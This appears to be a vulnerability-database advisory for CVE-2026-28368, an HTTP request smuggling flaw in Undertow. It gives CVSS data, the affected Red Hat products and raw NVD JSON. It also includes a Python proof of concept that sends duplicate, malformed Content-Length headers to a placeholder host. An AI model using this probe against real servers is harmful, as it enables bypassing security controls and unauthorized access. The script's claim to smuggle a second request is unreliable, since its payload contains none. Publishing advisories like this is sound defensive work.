Security Vulnerability Report
中文
CVE-2026-28368 CVSS 8.7 HIGH

CVE-2026-28368

Published: 2026-03-27 17:16:28
Last Modified: 2026-03-31 18:20:30
Source: [email protected]

Description

A flaw was found in Undertow. This vulnerability allows a remote attacker to construct specially crafted requests where header names are parsed differently by Undertow compared to upstream proxies. This discrepancy in header interpretation can be exploited to launch request smuggling attacks, potentially bypassing security controls and accessing unauthorized resources.

CVSS Details

CVSS Score
8.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:redhat:build_of_apache_camel_-_hawtio:4.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:build_of_apache_camel_for_spring_boot:4.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:data_grid:8.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:fuse:7.0.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.0.0:*:*:*:*:*:*:* - VULNERABLE
Undertow (具体受影响版本请参考RedHat官方通告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket # Target configuration host = "target.example.com" port = 80 def send_smuggling_request(): """ PoC for HTTP Request Smuggling via Header Parsing Discrepancy. This attempts to send a request that the proxy interprets differently than the Undertow backend, potentially smuggling the second request. """ # Constructing a request with a malformed header name # The space before 'Content-Length' might be handled differently # by the proxy vs Undertow. payload = ( "POST / HTTP/1.1\r\n" f"Host: {host}\r\n" "Content-Length: 6\r\n" " Content-Length: 4\r\n" # Malformed header: leading space "\r\n" "123456" ) try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.send(payload.encode()) # Receive response to observe behavior response = s.recv(4096) print("Response received:") print(response.decode()) s.close() except Exception as e: print(f"Error: {e}") if __name__ == "__main__": send_smuggling_request()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-28368", "sourceIdentifier": "[email protected]", "published": "2026-03-27T17:16:27.993", "lastModified": "2026-03-31T18:20:30.077", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Undertow. This vulnerability allows a remote attacker to construct specially crafted requests where header names are parsed differently by Undertow compared to upstream proxies. This discrepancy in header interpretation can be exploited to launch request smuggling attacks, potentially bypassing security controls and accessing unauthorized resources."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-444"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redhat:build_of_apache_camel_-_hawtio:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "19B253BB-F6CE-400B-87EF-1DF1AFFC2445"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:build_of_apache_camel_for_spring_boot:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "06A6AC25-2E2D-4359-A806-CC0355513A20"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:data_grid:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "7095200A-4DAC-4433-99E8-86CA88E1E4D4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:fuse:7.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "AAD91726-93D9-4230-BF69-6A79B58E09E0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "72A54BDA-311C-413B-8E4D-388AD65A170A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform:8.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "0D8BC03A-4198-4488-946B-3F6B43962942"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform_expansion_pack:-:*:*:*:*:*:*:*", "matchCriteriaId": "0A24CBFB-4900-47A5-88D2-A44C929603DC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:process_automation:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "20A6B40D-F991-4712-8E30-5FE008505CB7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:single_sign-on:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "9EFEC7CA-8DDA-48A6-A7B6-1F1D14792890"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:undertow:-:*:*:*:*:*:*:*", "matchCriteriaId": "8190B427-8350-43AE-8F54-6A40B701C95E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-28368", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2443261", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.